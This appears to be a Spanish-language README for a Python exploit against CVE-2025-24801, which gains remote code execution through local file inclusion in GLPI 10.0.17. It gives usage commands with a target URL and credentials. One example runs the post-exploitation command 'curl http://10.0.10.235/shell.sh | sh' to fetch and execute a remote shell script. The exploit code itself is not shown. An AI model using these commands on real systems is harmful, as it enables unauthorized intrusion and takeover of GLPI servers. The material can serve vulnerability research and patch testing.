
Exploit en Python para CVE-2025-24801 que logra ejecución remota de código mediante inclusión local de archivos en GLPI 10.0.17. Incluye modo de ejecución de comandos para post-explotación.
Este exploit utiliza CVE-2025-24801 para obtener Ejecución Remota de Código (RCE) a través de Inclusión Local de Archivos (LFI) en GLPI 10.0.17. Prueba de Concepto (PoC) de este CVE con explicación de esta vulnerabilidad en GLPI.
Algunas aplicaciones exponen el endpoint /glpi/ (por ejemplo, http://172.16.11.130:8080/glpi/front/computer.form.php). Si la aplicación objetivo incluye este endpoint, es necesario agregarlo al parámetro --url (por ejemplo, --url http://172.16.11.130:8080/glpi).
Ejemplo de uso.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
Si ya ejecutó este exploit y desencadenó RCE, puede usar el parámetro --cmd para ejecutar solo el comando.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"